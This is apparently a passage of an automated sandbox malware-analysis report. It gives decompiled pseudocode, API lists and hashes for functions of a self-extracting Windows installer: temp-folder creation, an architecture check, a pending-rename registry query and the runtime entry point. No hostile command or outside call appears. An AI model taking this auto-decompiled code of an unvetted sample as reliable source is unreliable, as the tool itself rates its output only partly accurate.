                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37a36d0e9700a4fa759630d87e8ba997358d8a1797f88db28b8970e93a6f2d87
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9112B7130052477E330AB36AC49FEF766DDFD2325F200165F646D2191CE788D8386A5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00025467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 522 25467-25484 523 2548a-25490 call 253a1 522->523 524 2551c-25528 call 21680 522->524 527 25495-25497 523->527 528 2552d-25539 call 258c8 524->528 529 25581-25583 527->529 530 2549d-254c0 call 21781 527->530 537 2553b-25545 CreateDirectoryA 528->537 538 2554d-25552 528->538 532 2558d-2559d call 26ce0 529->532 539 254c2-254d8 GetSystemInfo 530->539 540 2550c-2551a call 2658a 530->540 542 25577-2557c call 26285 537->542 543 25547 537->543 544 25554-25557 call 2597d 538->544 545 25585-2558b 538->545 548 254da-254dd 539->548 549 254fe 539->549 540->528 542->529 543->538 555 2555c-2555e 544->555 545->532 553 254f7-254fc 548->553 554 254df-254e2 548->554 556 25503-25507 call 2658a 549->556 553->556 558 254f0-254f5 554->558 559 254e4-254e7 554->559 555->545 560 25560-25566 555->560 556->540 558->556 559->540 562 254e9-254ee 559->562 560->529 561 25568-25575 RemoveDirectoryA 560->561 561->529 562->556
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E00025467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x28004; // 0xf4950d3e
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x291e4;
					_t42 = 0x104;
					E00021680(0x291e4, 0x104);
					L14:
					_t13 = E000258C8(_t48); // executed
					if(_t13 != 0) {
						L17:
						_t42 = _a4;
						if(_a4 == 0) {
							L23:
							 *0x29124 = 0;
							_t14 = 1;
							L24:
							return E00026CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
						}
						_t16 = E0002597D(_t48, _t42, 1, 0); // executed
						if(_t16 != 0) {
							goto L23;
						}
						_t61 =  *0x28a20; // 0x0
						if(_t61 != 0) {
							 *0x28a20 = 0;
							RemoveDirectoryA(_t48);
						}
						L22:
						_t14 = 0;
						goto L24;
					}
					if(CreateDirectoryA(_t48, 0) == 0) {
						 *0x29124 = E00026285();
						goto L22;
					}
					 *0x28a20 = 1;
					goto L17;
				}
				_t42 =  &_v268;
				_t20 = E000253A1(__ecx,  &_v268); // executed
				if(_t20 == 0) {
					goto L22;
				}
				_push(__ecx);
				_t48 = 0x291e4;
				E00021781(0x291e4, 0x104, __ecx,  &_v268);
				if(( *0x29a34 & 0x00000020) == 0) {
					L12:
					_t42 = 0x104;
					E0002658A(_t48, 0x104, 0x21140);
					goto L14;
				}
				GetSystemInfo( &_v304);
				_t26 = _v304.dwOemId & 0x0000ffff;
				if(_t26 == 0) {
					_push("i386");
					L11:
					E0002658A(_t48, 0x104);
					goto L12;
				}
				_t28 = _t26 - 1;
				if(_t28 == 0) {
					_push("mips");
					goto L11;
				}
				_t29 = _t28 - 1;
				if(_t29 == 0) {
					_push("alpha");
					goto L11;
				}
				if(_t29 != 1) {
					goto L12;
				}
				_push("ppc");
				goto L11;
			}




















                                                                                                                                                                                                                                                0x00025472
                                                                                                                                                                                                                                                0x00025479
                                                                                                                                                                                                                                                0x00025481
                                                                                                                                                                                                                                                0x00025484
                                                                                                                                                                                                                                                0x0002551c
                                                                                                                                                                                                                                                0x00025521
                                                                                                                                                                                                                                                0x00025528
                                                                                                                                                                                                                                                0x0002552d
                                                                                                                                                                                                                                                0x0002552f
                                                                                                                                                                                                                                                0x00025539
                                                                                                                                                                                                                                                0x0002554d
                                                                                                                                                                                                                                                0x0002554d
                                                                                                                                                                                                                                                0x00025552
                                                                                                                                                                                                                                                0x00025585
                                                                                                                                                                                                                                                0x00025585
                                                                                                                                                                                                                                                0x0002558b
                                                                                                                                                                                                                                                0x0002558d
                                                                                                                                                                                                                                                0x0002559d
                                                                                                                                                                                                                                                0x0002559d
                                                                                                                                                                                                                                                0x00025557
                                                                                                                                                                                                                                                0x0002555e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025560
                                                                                                                                                                                                                                                0x00025566
                                                                                                                                                                                                                                                0x00025569
                                                                                                                                                                                                                                                0x0002556f
                                                                                                                                                                                                                                                0x0002556f
                                                                                                                                                                                                                                                0x00025581
                                                                                                                                                                                                                                                0x00025581
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025581
                                                                                                                                                                                                                                                0x00025545
                                                                                                                                                                                                                                                0x0002557c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002557c
                                                                                                                                                                                                                                                0x00025547
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025547
                                                                                                                                                                                                                                                0x0002548a
                                                                                                                                                                                                                                                0x00025490
                                                                                                                                                                                                                                                0x00025497
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002549d
                                                                                                                                                                                                                                                0x000254ab
                                                                                                                                                                                                                                                0x000254b4
                                                                                                                                                                                                                                                0x000254c0
                                                                                                                                                                                                                                                0x0002550c
                                                                                                                                                                                                                                                0x00025511
                                                                                                                                                                                                                                                0x00025515
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025515
                                                                                                                                                                                                                                                0x000254c9
                                                                                                                                                                                                                                                0x000254d6
                                                                                                                                                                                                                                                0x000254d8
                                                                                                                                                                                                                                                0x000254fe
                                                                                                                                                                                                                                                0x00025503
                                                                                                                                                                                                                                                0x00025507
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00025507
                                                                                                                                                                                                                                                0x000254da
                                                                                                                                                                                                                                                0x000254dd
                                                                                                                                                                                                                                                0x000254f7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000254f7
                                                                                                                                                                                                                                                0x000254df
                                                                                                                                                                                                                                                0x000254e2
                                                                                                                                                                                                                                                0x000254f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000254f0
                                                                                                                                                                                                                                                0x000254e7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000254e9
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000254C9
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002553D
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002556F
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000253FB
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025402
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002541F
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002542B
                                                                                                                                                                                                                                                  • Part of subcall function 000253A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025434
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                                • API String ID: 1979080616-3963195772
                                                                                                                                                                                                                                                • Opcode ID: 2665581c6859991f1e94baef276400e1d817c7f4f3418f52f23cfcf1246e28c4
                                                                                                                                                                                                                                                • Instruction ID: f57f53082bf16304fe318b46ae727a935c331879a62ed01339e022f76111c181
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2665581c6859991f1e94baef276400e1d817c7f4f3418f52f23cfcf1246e28c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6312970B00E305BDB60AF29BC599BEB7DBAB95302F14412AA905C2585DF74CF42869D
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0002256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 563 2256d-2257d 564 22622-22627 call 224e0 563->564 565 22583-22589 563->565 573 22629-2262f 564->573 567 2258b 565->567 568 225e8-22607 RegOpenKeyExA 565->568 572 22591-22595 567->572 567->573 569 225e3-225e6 568->569 570 22609-22620 RegQueryInfoKeyA 568->570 569->573 575 225d1-225dd RegCloseKey 570->575 572->573 574 2259b-225ba RegOpenKeyExA 572->574 574->569 576 225bc-225cb RegQueryValueExA 574->576 575->569 576->575
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E0002256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E000224E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                                0x00022572
                                                                                                                                                                                                                                                0x00022573
                                                                                                                                                                                                                                                0x00022575
                                                                                                                                                                                                                                                0x00022578
                                                                                                                                                                                                                                                0x0002257d
                                                                                                                                                                                                                                                0x00022627
                                                                                                                                                                                                                                                0x00022583
                                                                                                                                                                                                                                                0x00022586
                                                                                                                                                                                                                                                0x00022589
                                                                                                                                                                                                                                                0x000225eb
                                                                                                                                                                                                                                                0x00022607
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00022609
                                                                                                                                                                                                                                                0x0002261a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002261a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0002258b
                                                                                                                                                                                                                                                0x0002258b
                                                                                                                                                                                                                                                0x0002259e
                                                                                                                                                                                                                                                0x000225b2
                                                                                                                                                                                                                                                0x000225ba
                                                                                                                                                                                                                                                0x000225cb
                                                                                                                                                                                                                                                0x000225d1
                                                                                                                                                                                                                                                0x000225d6
                                                                                                                                                                                                                                                0x000225da
                                                                                                                                                                                                                                                0x000225dd
                                                                                                                                                                                                                                                0x000225dd
                                                                                                                                                                                                                                                0x000225e3
                                                                                                                                                                                                                                                0x000225e3
                                                                                                                                                                                                                                                0x000225e3
                                                                                                                                                                                                                                                0x0002258b
                                                                                                                                                                                                                                                0x00022589
                                                                                                                                                                                                                                                0x0002262f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00024096,00024096,?,00021ED3,00000001,00000000,?,?,00024137,?), ref: 000225B2
                                                                                                                                                                                                                                                • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00024096,?,00021ED3,00000001,00000000,?,?,00024137,?,00024096), ref: 000225CB
                                                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?,?,00021ED3,00000001,00000000,?,?,00024137,?,00024096), ref: 000225DD
                                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00024096,00024096,?,00021ED3,00000001,00000000,?,?,00024137,?), ref: 000225FF
                                                                                                                                                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00024096,00000000,00000000,00000000,00000000,?,00021ED3,00000001,00000000), ref: 0002261A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager, xrefs: 000225A8
                                                                                                                                                                                                                                                • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000225F5
                                                                                                                                                                                                                                                • PendingFileRenameOperations, xrefs: 000225C3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                                • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                                • Opcode ID: c2f28744ce65f9f3bba11d7ef313d2d7c60c66a34af2c2d1af9daa9e7073f9ac
                                                                                                                                                                                                                                                • Instruction ID: 7b44bb202b44a7b5fafdcb78d2db9a3ea50e69f1294bbc82661f511f95e7eda3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2f28744ce65f9f3bba11d7ef313d2d7c60c66a34af2c2d1af9daa9e7073f9ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91114235A42238FBAB309BD1AC4DEFF7EBCEF057A1F104155B908A2011DA745E45D6A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00026A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 577 26a60-26a91 call 27155 call 27208 GetStartupInfoW 583 26a93-26aa2 577->583 584 26aa4-26aa6 583->584 585 26abc-26abe 583->585 586 26aa8-26aad 584->586 587 26aaf-26aba Sleep 584->587 588 26abf-26ac5 585->588 586->588 587->583 589 26ad1-26ad7 588->589 590 26ac7-26acf _amsg_exit 588->590 592 26b05 589->592 593 26ad9-26ae9 call 26c3f 589->593 591 26b0b-26b11 590->591 594 26b13-26b24 _initterm 591->594 595 26b2e-26b30 591->595 592->591 597 26aee-26af2 593->597 594->595 598 26b32-26b39 595->598 599 26b3b-26b42 595->599 597->591 600 26af4-26b00 597->600 598->599 601 26b67-26b71 599->601 602 26b44-26b51 call 27060 599->602 604 26c39-26c3e call 2724d 600->604 603 26b74-26b79 601->603 602->601 613 26b53-26b65 602->613 606 26bc5-26bc8 603->606 607 26b7b-26b7d 603->607 614 26bd6-26be3 _ismbblead 606->614 615 26bca-26bd3 606->615 610 26b94-26b98 607->610 611 26b7f-26b81 607->611 619 26ba0-26ba2 610->619 620 26b9a-26b9e 610->620 611->606 618 26b83-26b85 611->618 613->601 616 26be5-26be6 614->616 617 26be9-26bed 614->617 615->614 616->617 617->603 621 26c1e-26c25 617->621 618->610 622 26b87-26b8a 618->622 623 26ba3-26bbc call 22bfb 619->623 620->623 625 26c32 621->625 626 26c27-26c2d _cexit 621->626 622->610 627 26b8c-26b92 622->627 623->621 630 26bbe-26bbf exit 623->630 625->604 626->625 627->618 630->606
                                                                                                                                                                                                                                                C-Code - Quality: 51%
                                                                                                                                                                                                                                                			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00027155();
				_push(0x58);
				_push(0x272b8);
				E00027208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x288b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x288b0; // 0x2
						if(__eflags != 0) {
							 *0x281e4 = _t58;
							goto L13;
						} else {
							 *0x288b0 = _t58;
							_t37 = E00026C3F(0x210b8, 0x210c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00026FF4();
						L13:
						_t68 =  *0x288b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x210b4);
							_push(0x210ac);
							L00027202();
							 *0x288b0 = 2;
						}
						if(_t53 == 0) {
							 *0x288ac = 0;
						}
						_t71 =  *0x288b4;
						if( *0x288b4 != 0 && E00027060(_t71, 0x288b4) != 0) {
							_t60 =  *0x288b4; // 0x0
							 *0x2a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00022BFB(0x20000, 0, _t59); // executed
							 *0x281e0 = _t30;
							__eflags =  *0x281f8;
							if( *0x281f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x281e4;
							if( *0x281e4 == 0) {
								__imp___cexit();
								_t30 =  *0x281e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0002724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                                                                0x00026a60
                                                                                                                                                                                                                                                0x00026a6a
                                                                                                                                                                                                                                                0x00026a6c
                                                                                                                                                                                                                                                0x00026a71
                                                                                                                                                                                                                                                0x00026a78
                                                                                                                                                                                                                                                0x00026a7f
                                                                                                                                                                                                                                                0x00026a85
                                                                                                                                                                                                                                                0x00026a8e
                                                                                                                                                                                                                                                0x00026a91
                                                                                                                                                                                                                                                0x00026a93
                                                                                                                                                                                                                                                0x00026a9c
                                                                                                                                                                                                                                                0x00026aa2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026aa6
                                                                                                                                                                                                                                                0x00026ab4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026aa8
                                                                                                                                                                                                                                                0x00026aaa
                                                                                                                                                                                                                                                0x00026aab
                                                                                                                                                                                                                                                0x00026aab
                                                                                                                                                                                                                                                0x00026abf
                                                                                                                                                                                                                                                0x00026abf
                                                                                                                                                                                                                                                0x00026ac5
                                                                                                                                                                                                                                                0x00026ad1
                                                                                                                                                                                                                                                0x00026ad7
                                                                                                                                                                                                                                                0x00026b05
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026ad9
                                                                                                                                                                                                                                                0x00026ad9
                                                                                                                                                                                                                                                0x00026ae9
                                                                                                                                                                                                                                                0x00026af0
                                                                                                                                                                                                                                                0x00026af2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026af4
                                                                                                                                                                                                                                                0x00026af4
                                                                                                                                                                                                                                                0x00026afb
                                                                                                                                                                                                                                                0x00026afb
                                                                                                                                                                                                                                                0x00026af2
                                                                                                                                                                                                                                                0x00026ac7
                                                                                                                                                                                                                                                0x00026ac7
                                                                                                                                                                                                                                                0x00026ac9
                                                                                                                                                                                                                                                0x00026b0b
                                                                                                                                                                                                                                                0x00026b0b
                                                                                                                                                                                                                                                0x00026b11
                                                                                                                                                                                                                                                0x00026b13
                                                                                                                                                                                                                                                0x00026b18
                                                                                                                                                                                                                                                0x00026b1d
                                                                                                                                                                                                                                                0x00026b24
                                                                                                                                                                                                                                                0x00026b24
                                                                                                                                                                                                                                                0x00026b30
                                                                                                                                                                                                                                                0x00026b39
                                                                                                                                                                                                                                                0x00026b39
                                                                                                                                                                                                                                                0x00026b3b
                                                                                                                                                                                                                                                0x00026b42
                                                                                                                                                                                                                                                0x00026b57
                                                                                                                                                                                                                                                0x00026b5f
                                                                                                                                                                                                                                                0x00026b65
                                                                                                                                                                                                                                                0x00026b65
                                                                                                                                                                                                                                                0x00026b67
                                                                                                                                                                                                                                                0x00026b6c
                                                                                                                                                                                                                                                0x00026b6e
                                                                                                                                                                                                                                                0x00026b71
                                                                                                                                                                                                                                                0x00026b74
                                                                                                                                                                                                                                                0x00026b74
                                                                                                                                                                                                                                                0x00026b79
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026b7d
                                                                                                                                                                                                                                                0x00026b81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026b83
                                                                                                                                                                                                                                                0x00026b8c
                                                                                                                                                                                                                                                0x00026b8d
                                                                                                                                                                                                                                                0x00026b90
                                                                                                                                                                                                                                                0x00026b90
                                                                                                                                                                                                                                                0x00026b83
                                                                                                                                                                                                                                                0x00026b81
                                                                                                                                                                                                                                                0x00026b94
                                                                                                                                                                                                                                                0x00026b98
                                                                                                                                                                                                                                                0x00026ba2
                                                                                                                                                                                                                                                0x00026b9a
                                                                                                                                                                                                                                                0x00026b9a
                                                                                                                                                                                                                                                0x00026b9a
                                                                                                                                                                                                                                                0x00026ba3
                                                                                                                                                                                                                                                0x00026bab
                                                                                                                                                                                                                                                0x00026bb0
                                                                                                                                                                                                                                                0x00026bb5
                                                                                                                                                                                                                                                0x00026bbc
                                                                                                                                                                                                                                                0x00026bbf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026bbf
                                                                                                                                                                                                                                                0x00026c1e
                                                                                                                                                                                                                                                0x00026c25
                                                                                                                                                                                                                                                0x00026c27
                                                                                                                                                                                                                                                0x00026c2d
                                                                                                                                                                                                                                                0x00026c2d
                                                                                                                                                                                                                                                0x00026c32
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00026bc5
                                                                                                                                                                                                                                                0x00026bc5
                                                                                                                                                                                                                                                0x00026bc8
                                                                                                                                                                                                                                                0x00026bcc
                                                                                                                                                                                                                                                0x00026bce
                                                                                                                                                                                                                                                0x00026bce
                                                                                                                                                                                                                                                0x00026bd1
                                                                                                                                                                                                                                                0x00026bd3
                                                                                                                                                                                                                                                0x00026bd3
                                                                                                                                                                                                                                                0x00026bd6
                                                                                                                                                                                                                                                0x00026bda
                                                                                                                                                                                                                                                0x00026be1
                                                                                                                                                                                                                                                0x00026be3
                                                                                                                                                                                                                                                0x00026be5
                                                                                                                                                                                                                                                0x00026be5
                                                                                                                                                                                                                                                0x00026be6
                                                                                                                                                                                                                                                0x00026be6
                                                                                                                                                                                                                                                0x00026be9
                                                                                                                                                                                                                                                0x00026bea
                                                                                                                                                                                                                                                0x00026bea
                                                                                                                                                                                                                                                0x00026b74
                                                                                                                                                                                                                                                0x00026c39
                                                                                                                                                                                                                                                0x00026c3e
                                                                                                                                                                                                                                                0x00026c3e
                                                                                                                                                                                                                                                0x00026abe
                                                                                                                                                                                                                                                0x00026abe
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00027182
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetCurrentProcessId.KERNEL32 ref: 00027191
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetCurrentThreadId.KERNEL32 ref: 0002719A
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: GetTickCount.KERNEL32 ref: 000271A3
                                                                                                                                                                                                                                                  • Part of subcall function 00027155: QueryPerformanceCounter.KERNEL32(?), ref: 000271B8
                                                                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,000272B8,00000058), ref: 00026A7F
